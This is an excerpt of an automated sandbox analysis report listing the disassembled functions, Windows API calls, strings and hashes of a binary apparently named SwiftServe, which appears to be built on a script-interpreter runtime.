GetDesktopWindow.USER32 ref: 00E7CCB9
GetWindowRect.USER32(00000000), ref: 00E7CCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E7CD0C
GetClientRect.USER32(?,?), ref: 00E7CD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E7CD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E7CD69

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 0a037aaaca9fe8db39c834c430a94479e8118808af4cb69f792c1d7b804e7a29
Instruction ID: f25d2c5f03c8d55ad229e2dd2feb46a129574f9f7295a4ecfb55f2cc9f03ae0d
Opcode Fuzzy Hash: 0a037aaaca9fe8db39c834c430a94479e8118808af4cb69f792c1d7b804e7a29
Instruction Fuzzy Hash: 54516D30900709AFDB219FA9CE85B6FBBF9FB44705F104A2CE54AB25A0D770B958CB50

Function 00EAA7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EAA87E
DestroyWindow.USER32(00000000,?), ref: 00EAA8F8

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EAA972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EAA994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EAA9A7
DestroyWindow.USER32(00000000), ref: 00EAA9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E20000,00000000), ref: 00EAAA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EAAA19
GetDesktopWindow.USER32 ref: 00EAAA32
GetWindowRect.USER32(00000000), ref: 00EAAA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EAAA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EAAA69

Part of subcall function 00E229AB: GetWindowLongW.USER32(?,000000EB), ref: 00E229BC

Strings

0, xrefs: 00EAA894
tooltips_class32, xrefs: 00EAA96B, 00EAA9F9

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 19924f66e5ce67a7c9ef526a97bd0ac84a31245a003fa5486814ecb9f2bda67b
Instruction ID: a555bd90e9ae41b494fa324dbe9f47d6105d6340e75470aa707e364817ec5ade
Opcode Fuzzy Hash: 19924f66e5ce67a7c9ef526a97bd0ac84a31245a003fa5486814ecb9f2bda67b
Instruction Fuzzy Hash: 19718A71240344AFD725CF28C849F6B7BE5EB89304F08162DF985AB2A1D770F906CB56

Function 00EACCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E229E2: GetWindowLongW.USER32(?,000000EB), ref: 00E229F3

DragQueryPoint.SHELL32(?,?), ref: 00EACCCF

Part of subcall function 00EAB1A9: ClientToScreen.USER32(?,?), ref: 00EAB1D2
Part of subcall function 00EAB1A9: GetWindowRect.USER32(?,?), ref: 00EAB248
Part of subcall function 00EAB1A9: PtInRect.USER32(?,?,00EAC6BC), ref: 00EAB258

SendMessageW.USER32(?,000000B0,?,?), ref: 00EACD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EACD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EACD66
_wcscat.LIBCMT ref: 00EACD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EACDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 00EACDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 00EACDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 00EACDFF
DragFinish.SHELL32(?), ref: 00EACE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EACEF9

Strings

@GUI_DRAGFILE, xrefs: 00EACEA8
@GUI_DROPID, xrefs: 00EACE26
@GUI_DRAGID, xrefs: 00EACE71

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: a8767d8cfd4886121706e5e8ba9f5c058b3597875c1042a1eb627f202b8dee56
Instruction ID: 824bc403e7931383d90fa64167bc06b3890dd28338306289fd584a29180a1a1a
Opcode Fuzzy Hash: a8767d8cfd4886121706e5e8ba9f5c058b3597875c1042a1eb627f202b8dee56
Instruction Fuzzy Hash: 22618C71108301AFC711DF61DC89D9FBBE8EFC9350F101A2EF595A62A1DB30AA49CB52

Function 00E882D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00E8831A
VariantCopy.OLEAUT32(00000000,?), ref: 00E88323
VariantClear.OLEAUT32(00000000), ref: 00E8832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00E8841D
__swprintf.LIBCMT ref: 00E8844D
VarR8FromDec.OLEAUT32(?,?), ref: 00E88479
VariantInit.OLEAUT32(?), ref: 00E8852A
SysFreeString.OLEAUT32(?), ref: 00E885BE
VariantClear.OLEAUT32(?), ref: 00E88618
VariantClear.OLEAUT32(?), ref: 00E88627
VariantInit.OLEAUT32(00000000), ref: 00E88665

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00E88447
Default, xrefs: 00E884DA

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: b7075fd6597870dc34e885a9e6fe6b0b5936c3345148635365dfb03cb9c78e3e
Instruction ID: 88f7e62f5f9b57e12598b7ccdb0361d7a3dd2519065239b865690299d3dea8c7
Opcode Fuzzy Hash: b7075fd6597870dc34e885a9e6fe6b0b5936c3345148635365dfb03cb9c78e3e
Instruction Fuzzy Hash: C3D1D071604615EBDB20AF65DA84BAEB7F4BF04B00F64A555E81DBB281DF30EC44DBA0

Function 00EA49CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00EA4A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EA4AAC

Strings

UNCHECK, xrefs: 00EA4C88
GETITEMCOUNT, xrefs: 00EA4B8E
CHECK, xrefs: 00EA4ACC
SELECT, xrefs: 00EA4C5D
GETTEXT, xrefs: 00EA4BFF
GETTOTALCOUNT, xrefs: 00EA4A93
GETSELECTED, xrefs: 00EA4BBC
EXPAND, xrefs: 00EA4B5E
ISCHECKED, xrefs: 00EA4C2F
EXISTS, xrefs: 00EA4B15
COLLAPSE, xrefs: 00EA4AF2

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: a8a1452f9a787c28c0ea10e18c2c38e9c6158b4b787532ecd1bed43cc6db40c9
Instruction ID: f1d786c7ac5c3cd83a1eaf1274d0cb39ce949a25431a79587982838282211eff
Opcode Fuzzy Hash: a8a1452f9a787c28c0ea10e18c2c38e9c6158b4b787532ecd1bed43cc6db40c9
Instruction Fuzzy Hash: 84916EB02047119BCB04EF10D451A6AB7E1AFD9354F14A869F8967B3E2DB70FD4ACB81

Function 00E8E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00E8E31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 00E8E32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E8E33B
__wsplitpath.LIBCMT ref: 00E8E399
_wcscat.LIBCMT ref: 00E8E3B1
_wcscat.LIBCMT ref: 00E8E3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E8E3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00E8E3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 00E8E41E
SetCurrentDirectoryW.KERNEL32(?), ref: 00E8E43F
_wcscpy.LIBCMT ref: 00E8E44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E8E48A

Strings

*.*, xrefs: 00E8E445

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: d9b7d0499397e9cf758f569d507a34f330195a95f2af965d9efdad6a17a30d6b
Instruction ID: 04f08ba98d1c2e7b512abd45f352336ac9062b857589ae020752b35a44807d8a
Opcode Fuzzy Hash: d9b7d0499397e9cf758f569d507a34f330195a95f2af965d9efdad6a17a30d6b
Instruction Fuzzy Hash: F26166B25046159FC710EF60D844A9FB3E8FF88314F04991EF98DA7261EB31E909CB92

Function 00E223F7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00E21F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E22412,?,00000000,?,?,?,?,00E21AA7,00000000,?), ref: 00E21F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E224AF
KillTimer.USER32(-00000001,?,?,?,?,00E21AA7,00000000,?,?,00E21EBE,?,?), ref: 00E2254A
DestroyAcceleratorTable.USER32(00000000), ref: 00E5BFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E21AA7,00000000,?,?,00E21EBE,?,?), ref: 00E5C018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E21AA7,00000000,?,?,00E21EBE,?,?), ref: 00E5C02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E21AA7,00000000,?,?,00E21EBE,?,?), ref: 00E5C04B
DeleteObject.GDI32(00000000), ref: 00E5C05D

Strings

h, xrefs: 00E2256F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: h
API String ID: 641708696-1717268160
Opcode ID: a0444ace3c879f4e5fb9dddf5a9a7f9c849272a66bcc03c38df604f6cdf16fe5
Instruction ID: 45d784369044414655aae3a185d49394aaf65667dd25819493fcaa0448e71824
Opcode Fuzzy Hash: a0444ace3c879f4e5fb9dddf5a9a7f9c849272a66bcc03c38df604f6cdf16fe5
Instruction Fuzzy Hash: F961DD30104764EFCB25AF15ED48B2A77F1FB5031AF10AA1DE5927A9A0C370B889DF91

Function 00E8A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00E8A2C2

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00E8A2E3
__swprintf.LIBCMT ref: 00E8A33C
__swprintf.LIBCMT ref: 00E8A355
_wprintf.LIBCMT ref: 00E8A3FC
_wprintf.LIBCMT ref: 00E8A41A

Strings

^ ERROR , xrefs: 00E8A391
"%s" (%d) : ==> %s:%s%s, xrefs: 00E8A3F7
"%s" (%d) : ==> %s:, xrefs: 00E8A415
Line %d (File "%s"):, xrefs: 00E8A336, 00E8A34F
Error: , xrefs: 00E8A3C4
Incorrect parameters to object property !, xrefs: 00E8A39E

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 6b9bc1d14acab678bacac5bd4ec3c5282b77a43a8fee1d410ff45c89e34bc1ff
Instruction ID: 5adcdac04f3b3a5b68db68d4ebddca0277d397a10e677df8fe7babd3c47eb2d9
Opcode Fuzzy Hash: 6b9bc1d14acab678bacac5bd4ec3c5282b77a43a8fee1d410ff45c89e34bc1ff
Instruction Fuzzy Hash: 6E51C971900209AADF14EBE0DD4AEEEBBB9EF04340F1411AAF50972162EB312F59DB51

Function 00E80065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00E6F8B8,00000001,0000138C,00000001,00000001,00000001,?,00E93FF9,00000001), ref: 00E8009A
LoadStringW.USER32(00000000,?,00E6F8B8,00000001), ref: 00E800A3

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

GetModuleHandleW.KERNEL32(00000000,00EE7310,?,00000FFF,?,?,00E6F8B8,00000001,0000138C,00000001,00000001,00000001,?,00E93FF9,00000001,00000001), ref: 00E800C5
LoadStringW.USER32(00000000,?,00E6F8B8,00000001), ref: 00E800C8
__swprintf.LIBCMT ref: 00E80118
__swprintf.LIBCMT ref: 00E80129
_wprintf.LIBCMT ref: 00E801D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E801E9

Strings

^ ERROR, xrefs: 00E8017E
%s (%d) : ==> %s: %s %s, xrefs: 00E801CD
Line %d (File "%s"):, xrefs: 00E80112
Error: , xrefs: 00E801A0
Line %d:, xrefs: 00E80123

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: b72d97508bcdb45ab70631a47b37d9b5b8abb2decd22fccba8a7ceb71b2bd611
Instruction ID: 6a64825fda34bb155efc69ed46abc940855febd476f4f50473a3b9148f508603
Opcode Fuzzy Hash: b72d97508bcdb45ab70631a47b37d9b5b8abb2decd22fccba8a7ceb71b2bd611
Instruction Fuzzy Hash: 56414272800219AACF14FBE0CD9AEEEB7B8EF54341F1011A9F505B2092DA756F49CB61

Function 00E8A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00E24D37: __itow.LIBCMT ref: 00E24D62
Part of subcall function 00E24D37: __swprintf.LIBCMT ref: 00E24DAC

CharLowerBuffW.USER32(?,?), ref: 00E8AA0E
GetDriveTypeW.KERNEL32 ref: 00E8AA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E8AAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E8AADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E8AB08

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

Strings

close cd wait, xrefs: 00E8AAF3
open, xrefs: 00E8AA35
open , xrefs: 00E8AA6A
close, xrefs: 00E8AA14
closed, xrefs: 00E8AA22, 00E8AA2B
type cdaudio alias cd wait, xrefs: 00E8AA86
wait, xrefs: 00E8AAC5
set cd door , xrefs: 00E8AAA9

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: dddc7162fc998af5033798db740db61a6faf23662c86fe9673aa74be82a74112
Instruction ID: ccfc2ef1147ba26c19faeabf9c91efe8846ab38c42d43fbb96da0f17da9ad11e
Opcode Fuzzy Hash: dddc7162fc998af5033798db740db61a6faf23662c86fe9673aa74be82a74112
Instruction Fuzzy Hash: 37518D711043049FC704EF10C88196AB7E4FF88758F14696EF899672A1EB31ED0ACB52

Function 00E8A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E8A852
__swprintf.LIBCMT ref: 00E8A874
CreateDirectoryW.KERNEL32(?,00000000), ref: 00E8A8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E8A8D6
_memset.LIBCMT ref: 00E8A8F5
_wcsncpy.LIBCMT ref: 00E8A931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E8A966
CloseHandle.KERNEL32(00000000), ref: 00E8A971
RemoveDirectoryW.KERNEL32(?), ref: 00E8A97A
CloseHandle.KERNEL32(00000000), ref: 00E8A984

Strings

\, xrefs: 00E8A88A
:, xrefs: 00E8A895
\??\%s, xrefs: 00E8A86E

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 3c77eaf9f06a10c29480b5ab58c331b7adb4a200a1d015f2ea8e93119d15b92f
Instruction ID: fde1b4fbf257e86426143458d10b12c64bee2c994e4135a0d95a95c4a1431a39
Opcode Fuzzy Hash: 3c77eaf9f06a10c29480b5ab58c331b7adb4a200a1d015f2ea8e93119d15b92f
Instruction Fuzzy Hash: 0931A17150421AABEB219FA1EC49FEB73BCEF88700F1451B6F50CF2160E770A6498B25

Function 00EAC0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00EA982C,?,?), ref: 00EAC0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00EA982C,?,?,00000000,?), ref: 00EAC0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00EA982C,?,?,00000000,?), ref: 00EAC0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,00EA982C,?,?,00000000,?), ref: 00EAC0F7
GlobalLock.KERNEL32(00000000,?,?,?,?,00EA982C,?,?,00000000,?), ref: 00EAC100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EA982C,?,?,00000000,?), ref: 00EAC10F
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00EA982C,?,?,00000000,?), ref: 00EAC118
CloseHandle.KERNEL32(00000000,?,?,?,?,00EA982C,?,?,00000000,?), ref: 00EAC11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EA982C,?,?,00000000,?), ref: 00EAC130
OleLoadPicture.OLEAUT32(?,00000000,00000000,00EB3C7C,?), ref: 00EAC149
GlobalFree.KERNEL32(00000000), ref: 00EAC159
GetObjectW.GDI32(00000000,00000018,?), ref: 00EAC17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00EAC1A8
DeleteObject.GDI32(00000000), ref: 00EAC1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EAC1E6

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 8ac9169d2b5178446c17bad0bcb27d7ba87f7c0090671dbcef65659854974bfd
Instruction ID: 350472a8db56c5b5bd2914dd57fb68202ae857f204eca778b5dda35038af91da
Opcode Fuzzy Hash: 8ac9169d2b5178446c17bad0bcb27d7ba87f7c0090671dbcef65659854974bfd
Instruction Fuzzy Hash: E1413A71601208EFCB219F65DC88EAF7BB8EF8A715F104158F905FB261DB30A945DB60

Function 00E8DEDC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00E8E053
_wcscat.LIBCMT ref: 00E8E06B
_wcscat.LIBCMT ref: 00E8E07D
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E8E092
SetCurrentDirectoryW.KERNEL32(?), ref: 00E8E0A6
GetFileAttributesW.KERNEL32(?), ref: 00E8E0BE
SetFileAttributesW.KERNEL32(?,00000000), ref: 00E8E0D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00E8E0EA

Strings

*.*, xrefs: 00E8E129

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
